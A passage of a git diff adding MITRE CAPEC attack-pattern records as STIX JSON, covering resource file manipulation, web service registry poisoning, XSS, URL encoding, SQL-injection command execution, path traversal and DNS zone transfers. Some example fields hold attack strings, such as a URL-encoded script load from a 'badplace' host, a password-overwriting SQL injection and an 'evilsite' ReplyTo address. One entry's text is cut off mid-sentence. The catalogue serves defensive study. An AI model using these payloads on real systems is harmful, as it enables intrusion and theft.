"An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/35.html", + "external_id": "CAPEC-35" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html", + "external_id": "CWE-94" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html", + "external_id": "CWE-96" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/95.html", + "external_id": "CWE-95" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/97.html", + "external_id": "CWE-97" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/272.html", + "external_id": "CWE-272" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html", + "external_id": "CWE-59" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/282.html", + "external_id": "CWE-282" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/275.html", + "external_id": "CWE-275" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/264.html", + "external_id": "CWE-264" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html", + "external_id": "CWE-270" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/714.html", + "external_id": "CWE-714" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerprint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. If the aliases are changed, then a standard Unix \"cp\" command can be rerouted to \"rm\" or other standard command so the user's intention is subverted.", + "The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser.", + "\n Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/)\n http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here\n The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process.\n ", + "\n The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name \"public\" grants all users with the public role the ability to use the administration functionality.\n < security-constraint>Security processing rules for admin screens/admin/*POSTGETadministratorpublic\n \n \n \n The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must have the ability to modify non-executable files consumed by the target software." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--80135864-8689-44e9-8bdb-2c5034a76506.json b/capec/attack-pattern/attack-pattern--80135864-8689-44e9-8bdb-2c5034a76506.json new file mode 100644 index 0000000000..cbf40c8af7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--80135864-8689-44e9-8bdb-2c5034a76506.json @@ -0,0 +1,71 @@ +{ + "type": "bundle", + "id": "bundle--d5e68840-1905-473e-a9f1-71e37be9a37b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--80135864-8689-44e9-8bdb-2c5034a76506", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Poison Web Service Registry", + "description": "SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata (to effect a denial of service), and delete information about service provider interfaces. WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. The attacker that can rewrite WS-addressing information gains the ability to route service requesters to any service providers, and the ability to route service provider response to any service. Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol. The basic flow for the attacker consists of either altering the data at rest in the registry or uploading malicious content by spoofing a service provider. The service requester is then redirected to send its requests and/or responses to services the attacker controls.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/51.html", + "external_id": "CAPEC-51" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime.\n http://example.com/Message\n http://valid.example/validClient\n http://evilsite/evilClient\n http://validfaults.example/ErrorHandler\n \n \n In this example \"evilsite\" is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with ReplyTo header it will not generate a Soap fault.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to write to resources or redirect access to the service registry." + ], + "x_capec_resources_required": [ + "Capability to directly or indirectly modify registry resources" + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--801eb3fe-c710-4f81-8f55-f1a500802c53.json b/capec/attack-pattern/attack-pattern--801eb3fe-c710-4f81-8f55-f1a500802c53.json new file mode 100644 index 0000000000..0ae6202074 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--801eb3fe-c710-4f81-8f55-f1a500802c53.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--0de95aa6-fcb0-4e53-96af-655577743c38", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--801eb3fe-c710-4f81-8f55-f1a500802c53", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Add Malicious File to Shared Webroot", + "description": "An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/563.html", + "external_id": "CAPEC-563" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--80de694a-0a84-40b1-9c56-ec04747ca485.json b/capec/attack-pattern/attack-pattern--80de694a-0a84-40b1-9c56-ec04747ca485.json new file mode 100644 index 0000000000..6c973d548a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--80de694a-0a84-40b1-9c56-ec04747ca485.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--67d4907c-27be-4b4a-be47-9016d8dbc81b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--80de694a-0a84-40b1-9c56-ec04747ca485", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "XSS Using Doubled Characters", + "description": "The attacker bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. For example, by doubling the < before a script command, (<def: whatever\n ", + "\n Meta-characters are among the most valuable tools attackers have to deceive users into taking some action on their behalf. E-mail is perhaps the most efficient and cost effective attack distribution tool available, this has led to the phishing pandemic.\n Meta-characters like \\w \\s \\d ^ can allow the attacker to escape out of the expected behavior to execute additional commands. Escaping out the process (such as email client) lets the attacker run arbitrary code in the user's process.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This attack targets most widely deployed feature rich email applications, including web based email programs." + ], + "x_capec_skills_required": { + "Low": "To distribute email" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb.json b/capec/attack-pattern/attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb.json new file mode 100644 index 0000000000..d46771080f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--7e204e3e-3cfc-4078-a3c9-dc5f6add7abc", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "name": "Absolute Path Traversal", + "description": "An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \"..\" to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/597.html", + "external_id": "CAPEC-597" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/36.html", + "external_id": "CWE-36" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_prerequisites": [ + "The target must leverage and access an underlying file system." + ], + "x_capec_resources_required": [ + "The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks.", + "Medium": "Programming attacks." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9.json b/capec/attack-pattern/attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9.json new file mode 100644 index 0000000000..64ecaf68c5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9.json @@ -0,0 +1,145 @@ +{ + "type": "bundle", + "id": "bundle--935abd5f-a0a7-412c-bbed-06e2744b7de7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "URL Encoding", + "description": "This attack targets the encoding of the URL. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The attacker could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an attacker may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/72.html", + "external_id": "CAPEC-72" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html", + "external_id": "CWE-177" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html", + "external_id": "CWE-172" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html", + "external_id": "CWE-73" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/21.html", + "external_id": "CWE-21" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html", + "external_id": "REF-495" + }, + { + "source_name": "reference_from_CAPEC", + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "url": "http://www.ietf.org/rfc/rfc3986.txt", + "external_id": "REF-496" + }, + { + "source_name": "reference_from_CAPEC", + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "url": "http://www.ietf.org/rfc/rfc1738.txt", + "external_id": "REF-497" + }, + { + "source_name": "reference_from_CAPEC", + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp", + "external_id": "REF-498" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "url": "http://www.albionresearch.com/misc/urlencode.php", + "external_id": "REF-499" + }, + { + "source_name": "reference_from_CAPEC", + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS", + "external_id": "REF-500" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: URL Encodings in IceCast MP3 Server.\n The following type of encoded string has been known traverse directories against the IceCast MP3 server9:\n http://[targethost]:8000/somefile/%2E%2E/target.mp3\n or using\n \"/%25%25/\" instead of \"/../\".\n The control character \"..\" can be used by an attacker to escape the document root.See also: CVE-2001-0784", + "\n Cross-Site Scripting\n \n URL-Encoded attack:http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e\n \n HTML execution:\n [R.72.3][REF-35]\n ", + "\n SQL Injection\n \n Original database query in the example file - \"login.asp\":SQLQuery = \"SELECT preferences FROM logintable WHERE userid='\" & Request.QueryString(\"userid\") & \"' AND password='\" & Request.QueryString(\"password\") & \"';\"\n \n URL-encoded attack:http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00\n \n Executed database query:SELECT preferences FROM logintable WHERE userid='bob'; update logintable set password='0wn3d';\n From \"URL encoded attacks\", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application should accepts and decodes URL input.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An attacker can try special characters in the URL and bypass the URL validation.", + "Medium": "The attacker may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6.json b/capec/attack-pattern/attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6.json new file mode 100644 index 0000000000..408c5ac0ac --- /dev/null +++ b/capec/attack-pattern/attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6.json @@ -0,0 +1,91 @@ +{ + "type": "bundle", + "id": "bundle--3d3c378d-c72a-40d2-98bf-8723b54849b5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Command Line Execution through SQL Injection", + "description": "An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/108.html", + "external_id": "CAPEC-108" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html", + "external_id": "CWE-89" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html", + "external_id": "CWE-78" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/114.html", + "external_id": "CWE-114" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799).\n Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6799\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application does not properly validate data before storing in the database", + "Backend application implicitly trusts the data stored in the database", + "Malicious data is used on the backend as a command line argument" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker most likely has to be familiar with the internal functionality of the system to launch this attack. Without that knowledge, there are not many feedback mechanisms to give an attacker the indication of how to perform command injection or whether the attack is succeeding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--9eb0b1bd-88c1-4fdd-ac6b-126f037807ce.json b/capec/attack-pattern/attack-pattern--9eb0b1bd-88c1-4fdd-ac6b-126f037807ce.json new file mode 100644 index 0000000000..d25f7db7b9 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--9eb0b1bd-88c1-4fdd-ac6b-126f037807ce.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--a3dd669b-6d1d-4163-a642-dfbb6bad4fd6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--9eb0b1bd-88c1-4fdd-ac6b-126f037807ce", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Mobile Device Fault Injection", + "description": "Fault injection attacks against mobile devices use disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information. Although this attack usually requires physical control of the mobile device, it is non-destructive, and the device can be used after the attack without any indication that secret keys were compromised.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/625.html", + "external_id": "CAPEC-625" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Read Data (Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" + ], + "Confidentiality": [ + "Read Data (Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" + ] + }, + "x_capec_skills_required": { + "High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks on mobile devices. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required. This prerequisite makes the attack challenging to perform (assuming that physical security countermeasures and monitoring are in place)." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--9f443ed5-2c16-4d03-8af1-b853ebb05cc4.json b/capec/attack-pattern/attack-pattern--9f443ed5-2c16-4d03-8af1-b853ebb05cc4.json new file mode 100644 index 0000000000..ab4d133a87 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--9f443ed5-2c16-4d03-8af1-b853ebb05cc4.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--10c8cb71-31cf-4ba1-b4c4-9bd64e9cd157", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--9f443ed5-2c16-4d03-8af1-b853ebb05cc4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DNS Zone Transfers", + "description": "An attacker exploits a DNS misconfiguration that permits a ZONE transfer. Some external DNS servers will return a list of IP address and valid hostnames. Under certain conditions, it may even be possible to obtain Zone data about the organization's internal network. When successful the attacker learns valuable information about the topology of the target organization, including information about particular servers, their role within the IT structure, and possibly information about the operating systems running upon the network. This is configuration dependent behavior so it may also be required to search out multiple DNS servers while attempting to find one with ZONE transfers allowed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/291.html", + "external_id": "CAPEC-291" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_prerequisites": [ + "Access to a DNS server that allows Zone transfers." + ], + "x_capec_resources_required": [ + "A client application capable of interacting with the DNS server or a command-line utility or web application that automates DNS interactions." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--9f5fd42d-939f-474e-89af-3e5cde18ef0b.json b/capec/attack-pattern/attack-pattern--9f5fd42d-939f-474e-89af-3e5cde18ef0b.json new file mode 100644 index 0000000000..ca6217d353 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--9f5fd42d-939f-474e-89af-3e5cde18ef0b.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--7a5d165f-a6ae-4cc5-bdb1-6ed435833fa4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--9f5fd42d-939f-474e-89af-3e5cde18ef0b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Hardware Design Specifications Are Altered", + "description": "An attacker with access to a manufacturer's hardware manufacturing process documentation alters the design specifications, which introduces flaws advantageous to the attacker once the system is deployed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/521.html", + "external_id": "CAPEC-521" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "To operate at full capability, a manufacturer's network intrusion detection device needs to have either a Intel Xeon E7-2820 or AMD FX-8350 which have 8 \"cores\" available, allowing for advanced threading needed to handle large volumes of network traffic without resorting to dropping packets from the detection process. The attacker alters the documentation to state that the system design must use the Intel Core Duo or the AMD Phenom II X2, which only have 2 cores, causing the system to drop large amounts of packets during deployment at a victim site with large amounts of network traffic." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of hardware capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--9f791235-8dca-43f4-aeda-1c58a81f76ae.json 